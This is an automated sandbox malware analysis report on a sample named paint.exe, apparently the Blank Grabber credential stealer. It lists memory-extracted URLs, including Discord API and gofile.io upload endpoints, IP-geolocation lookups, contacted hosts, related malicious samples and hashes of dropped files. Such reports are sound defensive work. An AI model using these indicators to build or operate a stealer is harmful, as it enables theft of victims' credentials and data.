                                                                                                                                      https://google.com/mailpaint.exe, 00000001.00000003.1785051824.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008958155.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1920856863.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008427127.0000020771390000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.2006772338.0000020771906000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://packaging.python.org/specifications/entry-points/paint.exe, 00000001.00000002.2011815556.000002077262C000.00000004.00001000.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2011696050.00000207724C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplespaint.exe, 00000001.00000003.1915866896.0000020771B0A000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1917249999.0000020771D1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://www.python.org/psf/license/)paint.exe, 00000001.00000002.2015768208.00007FFDFB5D0000.00000040.00000001.01000000.00000005.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.pypaint.exe, 00000001.00000002.2007443684.000002076F58A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://www.google.com/paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://www.iqiyi.com/paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://foss.heptapod.net/pypy/pypy/-/issues/3539paint.exe, 00000001.00000002.2011696050.00000207724C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.paint.exe, 00000001.00000002.2008200069.0000020771094000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://google.com/paint.exe, 00000001.00000002.2008610347.0000020771500000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1711380871.0000020771500000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1771294068.00000207714FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://ocsp.sectigo.com0paint.exe, 00000000.00000003.1673052282.0000023393142000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://tools.ietf.org/html/rfc7231#section-4.3.6)paint.exe, 00000001.00000003.1920015922.0000020771C60000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1693798726.0000020771C60000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1711530938.0000020771C60000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1694074874.0000020771C60000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1781796667.0000020771C60000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1696653980.0000020771C60000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.2005810551.0000020771C60000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1725063677.0000020771C60000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2010232784.0000020771C60000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1734071594.0000020771C60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://contoso.com/Licensepowershell.exe, 0000002F.00000002.1831220495.000001B38C51B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://discordapp.com/api/v9/users/paint.exe, 00000001.00000002.2008689837.0000020771590000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_sourcepaint.exe, 00000001.00000002.2007861507.0000020770F6C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=paint.exe, 00000001.00000003.1916705724.0000020771B88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_specpaint.exe, 00000001.00000003.1678970007.000002077107D000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2007861507.0000020770F6C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://github.com/urllib3/urllib3/issues/2920paint.exe, 00000001.00000002.2012011288.0000020772710000.00000004.00001000.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1711530938.0000020771C38000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17paint.exe, 00000001.00000003.1915866896.0000020771B2D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#paint.exe, 00000000.00000003.1673052282.0000023393142000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_datapaint.exe, 00000001.00000002.2007443684.000002076F58A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://yahoo.com/paint.exe, 00000001.00000003.1785051824.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008958155.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1920856863.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008427127.0000020771390000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.2006772338.0000020771906000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://account.bellmedia.cpaint.exe, 00000001.00000002.2012300197.0000020772CE0000.00000004.00001000.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1753295021.0000020771B25000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1914665932.0000020772072000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1913464160.0000020771AD2000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1781575579.0000020771AD4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6paint.exe, 00000001.00000003.2006772338.000002077185F000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1785051824.000002077185F000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1920856863.0000020771864000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1696827300.0000020771892000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008958155.00000207718A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://login.microsoftonline.compaint.exe, 00000001.00000002.2012300197.0000020772CD4000.00000004.00001000.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1914665932.0000020772072000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2012300197.0000020772C50000.00000004.00001000.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1913464160.0000020771AD2000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1781575579.0000020771AD4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        http://crl.thawte.com/ThawteTimestampingCA.crl0paint.exe, 00000000.00000003.1673052282.0000023393142000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://html.spec.whatwg.org/multipage/paint.exe, 00000001.00000003.1785051824.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008958155.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1920856863.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.2006772338.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1696498061.0000020771927000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://www.ifeng.com/paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningspaint.exe, 00000001.00000002.2011696050.00000207724C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installpaint.exe, 00000001.00000003.1915866896.0000020771B0A000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1917249999.0000020771D1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchpaint.exe, 00000001.00000003.1916705724.0000020771B88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://www.rfc-editor.org/rfc/rfc8259#section-8.1paint.exe, 00000001.00000002.2009946233.0000020771B9C000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1782235643.0000020771B9E000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1711530938.0000020771B91000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.2004727333.0000020771B91000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1711380871.00000207714F1000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1725063677.0000020771BA0000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1734071594.0000020771B9E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://contoso.com/powershell.exe, 0000002F.00000002.1831220495.000001B38C51B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://oneget.orgXpowershell.exe, 0000002F.00000002.1831220495.000001B38C1B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://api.gofile.io/getServerpaint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngpaint.exe, 00000001.00000002.2008427127.0000020771390000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              http://nuget.org/NuGet.exepowershell.exe, 0000000C.00000002.1893410367.0000019D90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.1886205095.000001B39AC2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.1886205095.000001B39AD6D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.1831220495.000001B38C51B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 0000002F.00000002.1831220495.000001B38C1B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://sectigo.com/CPS0paint.exe, 00000000.00000003.1673052282.0000023393142000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/paint.exe, 00000001.00000003.2005215252.00000207714D8000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1781102686.00000207714D3000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1919791436.00000207714D8000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1712152844.00000207714D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                                                                      • 75% < No. of IPs
                                                                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                      208.95.112.1
                                                                                                                                                                                                                      ip-api.comUnited States
                                                                                                                                                                                                                      53334TUT-ASUSfalse
                                                                                                                                                                                                                      162.159.137.232
                                                                                                                                                                                                                      discord.comUnited States
                                                                                                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                      Analysis ID:1584382
                                                                                                                                                                                                                      Start date and time:2025-01-05 10:15:12 +01:00
                                                                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                      Overall analysis duration:0h 12m 6s
                                                                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                      Report type:full
                                                                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                      Number of analysed new started processes analysed:112
                                                                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                                                                      Technologies:
                                                                                                                                                                                                                      • HCA enabled
                                                                                                                                                                                                                      • EGA enabled
                                                                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                                                                      Sample name:paint.exe
                                                                                                                                                                                                                      Detection:MAL
                                                                                                                                                                                                                      Classification:mal100.rans.troj.adwa.spyw.expl.evad.winEXE@177/96@2/2
                                                                                                                                                                                                                      EGA Information:
                                                                                                                                                                                                                      • Successful, ratio: 50%
                                                                                                                                                                                                                      HCA Information:Failed
                                                                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 142.250.184.195, 20.12.23.50, 13.107.246.45
                                                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, gstatic.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                      • Execution Graph export aborted for target mshta.exe, PID 6492 because there are no executed function
                                                                                                                                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 1780 because it is empty
                                                                                                                                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 8364 because it is empty
                                                                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                      • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                      • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                      TimeTypeDescription
                                                                                                                                                                                                                      04:16:09API Interceptor133x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                      04:16:10API Interceptor5x Sleep call for process: WMIC.exe modified
                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                      208.95.112.1X9g8L63QGs.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                      • ip-api.com/json/?fields=225545
                                                                                                                                                                                                                      KpHYfxnJs6.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                      • ip-api.com/json/?fields=225545
                                                                                                                                                                                                                      9g9LZNE4bH.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                      • ip-api.com/json/?fields=225545
                                                                                                                                                                                                                      riFSkYVMKB.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                      • ip-api.com/json/?fields=225545
                                                                                                                                                                                                                      ddos tool.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                      • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                      kthiokadjg.exeGet hashmaliciousBlackshadesBrowse
                                                                                                                                                                                                                      • ip-api.com/json/
                                                                                                                                                                                                                      file.exeGet hashmaliciousAsyncRAT, XRed, XWormBrowse
                                                                                                                                                                                                                      • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                      file.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                      • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                      file.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                      • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                      23khy505ab.exeGet hashmaliciousNjratBrowse
                                                                                                                                                                                                                      • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                      162.159.137.232hkMUtKbCqV.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        X9g8L63QGs.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                          KpHYfxnJs6.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                            9g9LZNE4bH.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                              rename_me_before.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                                                                                                                                                                                                                arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  Bloxflip Predictor.exeGet hashmaliciousNjratBrowse
                                                                                                                                                                                                                                    phost.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                      WE8zqotCFj.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                                                                                                                                                                        EsgeCzT4do.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                          discord.comhkMUtKbCqV.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 162.159.137.232
                                                                                                                                                                                                                                          X9g8L63QGs.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                          • 162.159.137.232
                                                                                                                                                                                                                                          KpHYfxnJs6.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                          • 162.159.137.232
                                                                                                                                                                                                                                          9g9LZNE4bH.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                          • 162.159.137.232
                                                                                                                                                                                                                                          riFSkYVMKB.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                          • 162.159.138.232
                                                                                                                                                                                                                                          AimStar.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                          • 162.159.128.233
                                                                                                                                                                                                                                          rename_me_before.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                                                                                                                                                                                                                          • 162.159.137.232
                                                                                                                                                                                                                                          Fizzy Loader.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                                                                                                                                                                          • 162.159.138.232
                                                                                                                                                                                                                                          Jx6bD8nM4qW9sL3v.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 162.159.128.233
                                                                                                                                                                                                                                          dsoft.exeGet hashmaliciousPython Stealer, Creal StealerBrowse
                                                                                                                                                                                                                                          • 162.159.138.232
                                                                                                                                                                                                                                          ip-api.comX9g8L63QGs.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                                                                                          KpHYfxnJs6.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                                                                                          9g9LZNE4bH.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                                                                                          riFSkYVMKB.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                                                                                          ddos tool.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                                                                                          kthiokadjg.exeGet hashmaliciousBlackshadesBrowse
                                                                                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                                                                                          file.exeGet hashmaliciousAsyncRAT, XRed, XWormBrowse
                                                                                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                                                                                          file.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                                                                                          file.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                                                                                          23khy505ab.exeGet hashmaliciousNjratBrowse
                                                                                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                          CLOUDFLARENETUSK27Yg4V48M.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 104.21.56.70
                                                                                                                                                                                                                                          hkMUtKbCqV.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 162.159.135.234
                                                                                                                                                                                                                                          IH5XqCdf06.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 104.21.56.70
                                                                                                                                                                                                                                          3LcZO15oTC.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 104.21.43.44
                                                                                                                                                                                                                                          3jL3mqtjCn.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 104.21.48.1
                                                                                                                                                                                                                                          3LcZO15oTC.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 172.67.219.93
                                                                                                                                                                                                                                          elyho3x5zz.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                                                          17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                          • 172.64.41.3
                                                                                                                                                                                                                                          elyho3x5zz.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                                                          Tax_Refund_Claim_2024_Australian_Taxation_Office.jsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                          • 172.64.41.3
                                                                                                                                                                                                                                          TUT-ASUSX9g8L63QGs.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                                                                                          KpHYfxnJs6.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                                                                                          9g9LZNE4bH.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                                                                                          riFSkYVMKB.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                                                                                          ddos tool.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                                                                                          kthiokadjg.exeGet hashmaliciousBlackshadesBrowse
                                                                                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                                                                                          file.exeGet hashmaliciousAsyncRAT, XRed, XWormBrowse
                                                                                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                                                                                          file.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                                                                                          file.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                                                                                          23khy505ab.exeGet hashmaliciousNjratBrowse
                                                                                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                                                                                          No context
                                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI67162\VCRUNTIME140.dll3LcZO15oTC.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            X9g8L63QGs.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                              riFSkYVMKB.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                                mcgen.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                                  AimStar.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                                    DChOtFdp9T.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                                                                                                                                                                                      user.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        HX Design.exeGet hashmaliciousPython Stealer, Blank GrabberBrowse
                                                                                                                                                                                                                                                          YgJ5inWPQO.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                                                            wp-s2.exeGet hashmaliciousPython BackDoorBrowse
                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):64
                                                                                                                                                                                                                                                              Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:@...e...........................................................
                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):691200
                                                                                                                                                                                                                                                              Entropy (8bit):7.923948857852395
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:12288:2U9YNlrsDAL0YlKCsI4jx/NmRnuMRCyzEi43Mtw433pmYLRP0nnpchxn:2f7r6AL0cP3WlU3RCyzs3Mtw4Hp3REn2
                                                                                                                                                                                                                                                              MD5:53691E369A8F41115B60591F8EEC6450
                                                                                                                                                                                                                                                              SHA1:DC92A89E20093C1C9FF561F3118C375545B87CC9
                                                                                                                                                                                                                                                              SHA-256:80FACFFFE42F25CC0B2B5DB533CB9AA74571CEEC7F971FA392994CCDFD6FCCC3
                                                                                                                                                                                                                                                              SHA-512:0BF747879CEBFF6D5FB9547DBDC5BC80FB20A9A4BE1447FAB1DEA07374C762910B6397FCB4FBDC615B6A8692929C56A72A26B33C3F4B8553BDDBFD783D7F682F
                                                                                                                                                                                                                                                              Malicious:false
